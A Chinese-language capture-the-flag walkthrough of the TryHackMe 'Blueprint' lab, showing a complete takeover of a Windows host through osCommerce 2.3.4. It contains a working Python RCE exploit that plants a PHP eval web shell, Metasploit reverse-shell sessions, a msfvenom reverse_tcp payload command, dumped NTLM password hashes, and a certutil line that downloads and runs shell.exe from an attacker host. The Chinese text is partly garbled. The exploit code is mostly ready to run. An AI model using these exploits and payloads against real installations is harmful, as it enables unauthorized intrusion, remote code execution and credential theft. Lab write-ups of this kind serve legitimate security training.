免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(rootkali)-[~/tryhackme/Blueprint]└─# nmap -sV -Pn 10.10.3.110 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 03:34 ESTStats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing Service ScanService scan Timing: About 69.23% done; ETC: 03:37 (0:00:29 remaining)Nmap scan report for 10.10.3.110Host is up (0.47s latency).Not shown: 987 closed portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 7.5135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)3306/tcp open mysql MariaDB (unauthorized)8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)49152/tcp open msrpc Microsoft Windows RPC49153/tcp open msrpc Microsoft Windows RPC49154/tcp open msrpc Microsoft Windows RPC49158/tcp open msrpc Microsoft Windows RPC49159/tcp open msrpc Microsoft Windows RPC49160/tcp open msrpc Microsoft Windows RPCService Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 172.68 seconds服务剖析
能够看到开了3个http服务,一个共享服务以及若干rpc服务
浏览器顺次关上80和443端口服务,首页都报错。
8080服务显示有一个叫oscommerce的web app,版本是2.3.4
在kali搜寻这个web app的破绽状况:
┌──(rootkali)-[~/tryhackme/Blueprint]└─# searchsploit oscommerce 2.3.4---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------osCommerce 2.3.4 - Multiple Vulnerabilities | php/webapps/34582.txtosCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txtosCommerce 2.3.4.1 - 'products_id' SQL Injection | php/webapps/46329.txtosCommerce 2.3.4.1 - 'reviews_id' SQL Injection | php/webapps/46330.txtosCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting | php/webapps/49103.txtosCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.pyosCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results能够说满满都是破绽,包含sql注入,文件上传,近程代码执行等。
攻打
咱们把近程代码执行攻打脚本拷贝到本地,通过测试指标零碎php禁用了system函数,然而passthru函数是能够应用的。
咱们输出whoami
回显为:nt authority\system
nice,间接最高权限。
在这里我卡了十分久,因为我不能间接用powershell反弹shell到我的kali。
前面只好转变思路,既然反弹不了,那间接写一句话木马到靶机,还好eval函数也是能够应用的,攻打代码批改如下:
import requestsbase_url = "http://10.10.3.110:8080/oscommerce-2.3.4/catalog/"target_url = "http://10.10.3.110:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"data = { 'DIR_FS_DOCUMENT_ROOT': './'}payload = '\');'payload += """eval(@$_POST['cmd']);""" payload += '/*'data['DB_DATABASE'] = payloadr = requests.post(url=target_url, data=data)if r.status_code == 200: print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")else: print("[-] Exploit did not execute as planned")执行完下面的攻打脚本。到msf找到中国菜刀模块,填好参数:
msf6 exploit(multi/http/caidao_php_backdoor_exec) > optionsModule options (exploit/multi/http/caidao_php_backdoor_exec): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD cmd yes The password of backdoor Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.3.110 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /oscommerce-2.3.4/catalog/install/includes/configure.php yes The path of backdoor VHOST no HTTP server virtual hostPayload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Automatic攻打,拿到初始shell,查看是最高的system权限:
msf6 exploit(multi/http/caidao_php_backdoor_exec) > run[*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending exploit...[*] Sending stage (39282 bytes) to 10.10.3.110[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.3.110:49346) at 2021-11-17 04:10:33 -0500meterpreter > getuidServer username: SYSTEM (0)啃爹的是这个菜刀模块没有hashdump命令,咱们只好编译另一个性能残缺的payload
┌──(rootkali)-[~/tryhackme/Blueprint]└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4242 -f exe > reverse.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x86 from the payloadNo encoder specified, outputting raw payloadPayload size: 354 bytesFinal size of exe file: 73802 bytes上传到靶机当前,执行:
meterpreter > upload /root/tryhackme/Blueprint/reverse.exe[*] uploading : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /root/tryhackme/Blueprint/reverse.exe -> reverse.exe[*] uploaded : /root/tryhackme/Blueprint/reverse.exe -> reverse.exemeterpreter > execute -f reverse.exeProcess 4668 created.在另一个msf拿到一个残缺性能的shell:
Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.13.21.169 yes The listen address (an interface may be specified) LPORT 4242 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.13.21.169:4242 [*] Sending stage (175174 bytes) to 10.10.3.110[*] Meterpreter session 1 opened (10.13.21.169:4242 -> 10.10.3.110:49350) at 2021-11-17 04:39:12 -0500meterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::把下面lab哈希明码的这一段30e87bf999828446a1c1209ddde4c450拿到这个网站破解失去明文明码。
拿到root.txt
meterpreter > pwdC:\Users\Administrator\Desktopmeterpreter > lsListing: C:\Users\Administrator\Desktop=======================================Mode Size Type Last modified Name---- ---- ---- ------------- ----100666/rw-rw-rw- 282 fil 2019-04-11 18:36:47 -0400 desktop.ini100666/rw-rw-rw- 37 fil 2019-11-27 13:15:37 -0500 root.txt.txt又
看大佬的文章,攻打阶段上面的payload是能够从攻击机上传文件到靶机的,在这里记录一下:
payload = '\');'payload += '$var = shell_exec("cmd.exe /C certutil.exe -urlcache -split -f http://10.8.1.72/shell.exe shell.exe & shell.exe & nslookup test 10.8.1.72 ");' payload += 'echo $var;'payload += '/*'